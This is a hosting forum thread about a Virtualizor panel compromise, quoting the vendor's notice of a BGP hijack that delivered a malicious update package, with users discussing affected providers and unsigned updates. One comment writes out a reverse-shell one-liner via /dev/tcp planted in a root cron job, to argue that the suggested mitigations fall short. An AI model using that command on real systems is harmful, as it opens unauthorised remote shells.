Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!


New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

URGENT: Virtualizor Compromised (31st AUG)

123457»

Comments

  • xHostsxHosts Patron Provider, Veteran

    @JohnFilch123 said:

    @xHosts said:

    @LEBUserJoe said:
    What's more concerning is I have VPS on virtualiser with few providers in this thread, to this date i've received no notification from either of them they suffered potential access.

    Beyond the hack, why aren't providers notifying customers of this?

    We sent out a email to clients about the issue a few days ago

    I think I only received an email from you and there are more providers who are using Virtualizor. Sed.

    We tried to do things in order, establish the real issue and email clients.

    The longest part was the back and forth with Virtualizor which I understand they are very busy and may take a little time to reply, once we had a clear picture we sent out the email.

    Thanked by 2JohnFilch123 forest
  • @xHosts said: We tried to do things in order, establish the real issue and email clients.

    This is great, I am pretty happy to be your client :love:

    Thanked by 3xHosts forest JohnnySac
  • SaahibSaahib Host Rep, Veteran

    Is virtualizor is not on LET, I see no statement from them here but I think a good LET base is their customer.

  • Don't Naranjatech and LiteServer also use Virtualizor?

  • @Saahib said:
    Is virtualizor is not on LET, I see no statement from them here but I think a good LET base is their customer.

    Earlier in this thread:

    @virtualizor said:
    Virtualizor — Security Incident Update

    Between 28 Aug ~20:57 UTC and 30 Aug ~06:10 UTC (2026), a block of Hetzner IP addresses used by our services (162.55.80.0/24) was hit by a BGP hijack — internet traffic to those addresses was rerouted to an attacker's server (announced by AS62390 / NexonHost, via transit AS6204 / Zet.net). The attacker obtained a valid TLS certificate for our domains, so affected connections showed no certificate warning.

    Public RIPE routing data confirms the hijack ran in two waves — 28 Aug evening to 29 Aug ~08:50, then 29 Aug ~20:00 to 30 Aug ~06:00 — with an ~11-hour lull after Hetzner began announcing the range directly. Routing is now fully restored.

    Impact: a malicious Virtualizor update package was delivered to a small number of
    installations that happened to check for updates while their traffic was being diverted. This was a handful of servers, not the general user base — but because those requests went to the attacker and not to us, we cannot produce an exact list. Please treat every Virtualizor server as in scope.

    If you run Virtualizor, do this now:

    1. Check for this file: /etc/systemd/system/java-jre-update.service
      If it exists, your server was affected — do not just delete it. Contact our support if you need any help.

    2. In the Virtualizor master panel: reset all API keys, restrict API access by IP, remove any
      API key or SSH key you do not recognise, and lock SSH to trusted IPs.

    3. We will also launch a version to check for malicious codes on the servers.

    If you logged into softaculous.com/clients during the window: reset your password, and review your account activity. No cards are saved on our servers.

    A detailed article with the full timeline, technical analysis and the checksum / cleanup
    information will follow shortly.

    Thanked by 1rpqu
  • I’ve always wondered why so many providers use Virtualizor. I’m pretty sure whoever makes that decision has never actually used the user panel themselves — the UX is terrible and the whole panel feels clunky and outdated. Is it just cheap? Easy to set up?

    Thanked by 1loay
  • Can @SolidVPS give us any info on what's going on at their side? It seems they are heavily affected.

  • JohnFilch123JohnFilch123 Member
    edited September 4

    @zephyr32 said: Can @SolidVPS give us any info on what's going on at their side?

    They already answered in a relevant thread.

    Thanked by 2forest zephyr32
  • jesus christ

  • @hostnamaste said:

    @stupidgenius said:
    From my quick research providers that have advertised or listed Virtualizor on their site over the last 6 months, pinging for viability.

    FYI
    @DediRock
    @SolidVPS
    @SmokyHosts
    @hostdare
    @xHosts
    @Fourplex
    @rarecloud
    @HostMayo
    @hostnamaste
    @LittleCreek
    @HostSlick
    @3K33

    Thanks for including @hostnamaste in the list and for checking with the providers.

    We have investigated this on our side and also confirmed with our technical team. We have checked the reported indicators and run the official Virtualizor security scan, and we have found no signs of compromise on our Virtualizor infrastructure.

    Everything is clean from our side at this time. 👍

    I know it's offtopic but what kind of bullshit advertising is this? :)

    https://i.imgur.com/miGcwCF.png

  • BlaZeBlaZe Host Rep, Veteran

    @William said:
    Yes, but its very visible and requires some ressources unlike many attacks (eg. access to BGP and an ASN, forged LOA etc.).
    It makes not much sense to execute a hijack, break the panel (fake update, package etc. - work) and then start to blatantly SSH into random small hosts doing apparently nothing for hours, not even spam or scanning...

    You got a point. Maybe the competitors did it?

  • @alincupunct said:

    I know it's offtopic but what kind of bullshit advertising is this? :)

    https://i.imgur.com/miGcwCF.png

    It's a mystery box/gotcha game, but for servers?

  • SaahibSaahib Host Rep, Veteran

    @Arirang said:
    I’ve always wondered why so many providers use Virtualizor. I’m pretty sure whoever makes that decision has never actually used the user panel themselves — the UX is terrible and the whole panel feels clunky and outdated. Is it just cheap? Easy to set up?

    Yes, its easy to setup, it works and apparently cheaper? But I think when they started, there were not many competitors. Now we have better alternatives in terms of pricing, stability, UX. Virtualizor has really lost opportunity where they could have used their existing userbase and create something even better.

  • SaahibSaahib Host Rep, Veteran

    @forest said:

    @Saahib said:
    Is virtualizor is not on LET, I see no statement from them here but I think a good LET base is their customer.

    Earlier in this thread:

    @virtualizor said:
    Virtualizor — Security Incident Update

    Between 28 Aug ~20:57 UTC and 30 Aug ~06:10 UTC (2026), a block of Hetzner IP addresses used by our services (162.55.80.0/24) was hit by a BGP hijack — internet traffic to those addresses was rerouted to an attacker's server (announced by AS62390 / NexonHost, via transit AS6204 / Zet.net). The attacker obtained a valid TLS certificate for our domains, so affected connections showed no certificate warning.

    Public RIPE routing data confirms the hijack ran in two waves — 28 Aug evening to 29 Aug ~08:50, then 29 Aug ~20:00 to 30 Aug ~06:00 — with an ~11-hour lull after Hetzner began announcing the range directly. Routing is now fully restored.

    Impact: a malicious Virtualizor update package was delivered to a small number of
    installations that happened to check for updates while their traffic was being diverted. This was a handful of servers, not the general user base — but because those requests went to the attacker and not to us, we cannot produce an exact list. Please treat every Virtualizor server as in scope.

    If you run Virtualizor, do this now:

    1. Check for this file: /etc/systemd/system/java-jre-update.service
      If it exists, your server was affected — do not just delete it. Contact our support if you need any help.

    2. In the Virtualizor master panel: reset all API keys, restrict API access by IP, remove any
      API key or SSH key you do not recognise, and lock SSH to trusted IPs.

    3. We will also launch a version to check for malicious codes on the servers.

    If you logged into softaculous.com/clients during the window: reset your password, and review your account activity. No cards are saved on our servers.

    A detailed article with the full timeline, technical analysis and the checksum / cleanup
    information will follow shortly.

    Ah, I completely overlooked. If something similar happened with other provider, they would have regularly followed up, so I thought that was shared by some vzr user.

  • I also have a vps with 4vps.su they are also affected.

  • @virtualizor said: a malicious Virtualizor update package was delivered to a small number of

    installations that happened to check for updates while their traffic was being diverted

    I'm sure it's already been asked, but how did this allow a malicious update to be deployed? Do you not sign your updates??

    Using PHP is fine, but my guess is that there's no privilege separation and the the web code is running directly as root, which is a bad idea regardless of programming language.

    Have you had a security audit? After an issue like this, it'd be worth getting an audit of your code and infra to figure out if there's any security issues.

  • @Daniel15 said: Do you not sign your updates??

    Nope, they don't. :D

  • whiteriderwhiterider Member
    edited September 8

    Rabisu seems also affected.

    "Dear Customers / Stakeholders,
    We have detected an unauthorized access (intrusion) attempt within our virtualization infrastructure. To maintain the highest level of system security and to conduct a thorough investigation, we have taken proactive measures.
    As part of these measures:
    • All virtual machines (VMs) have been gracefully shut down,
    • Network access has been temporarily disabled.
    Our expert teams have the situation under control and are continuing their detailed analysis. We will keep you updated on our progress and provide further information as soon as the root cause is identified and full system security is restored.
    Thank you for your understanding and patience during this time."

    Thanked by 1monsoon73
  • In the last few days I've been getting all sorts of account reset codes popping up in my email, so it's obvious that my data got leaked by one of @virtualizor's clients again.

    If it was a one-off it'd be forgivable, but they get hacked so often that I'm stunned that anyone still uses their amateurish platform.

    There's always an excuse, but this has happened because they haven't been signing their updates and that tells you everything you need to know about their development practices.

    I'd say Softaculous is a joke company, but there's nothing funny about how they keep getting themselves pwned and the follow-on impact on their clients and their customers from their rank incompetence.

  • Wondering if ColoCrossing VPSes are affected by this as well, anyone know?

  • @CloudHopper said: There's always an excuse, but this has happened because they haven't been signing their updates and that tells you everything you need to know about their development practices.

    At this point, even AI slop is better. And that's saying something.

  • luckypenguinluckypenguin Member
    edited September 9

    @Virtualizor said: In the Virtualizor master panel: reset all API keys, restrict API access by IP, remove any API key or SSH key you do not recognise, and lock SSH to trusted IPs.

    Seriously, is that your best mitigation suggestion? What happened to the good old cron
    as root with something like bash -i >& /dev/tcp/12.34.56.78/1234 0>&1 ?
    Resetting your SSH keys / whitelisting inbound IPs won't stop it.

  • @Obelous said:
    I reported the .cc domain too but it's nicenic so they probably won't do shit.

    @Obelous, thank you for the detailed report and technical information.

    We reviewed the report concerning nerat.cc and applied appropriate measures while the case was being investigated. Additional information was later reviewed, and the reported issue had been addressed before the case was closed.

    The URLs, logs, hashes, and other technical indicators provided helped us review the case more efficiently.

  • @nicenic said:

    @Obelous said:
    I reported the .cc domain too but it's nicenic so they probably won't do shit.

    @Obelous, thank you for the detailed report and technical information.

    We reviewed the report concerning nerat.cc and applied appropriate measures while the case was being investigated. Additional information was later reviewed, and the reported issue had been addressed before the case was closed.

    The URLs, logs, hashes, and other technical indicators provided helped us review the case more efficiently.

    I'm so proud of you for suspending it more than 2 weeks after the attack happened.


    Thanked by 2forest alincupunct
Sign In or Register to comment.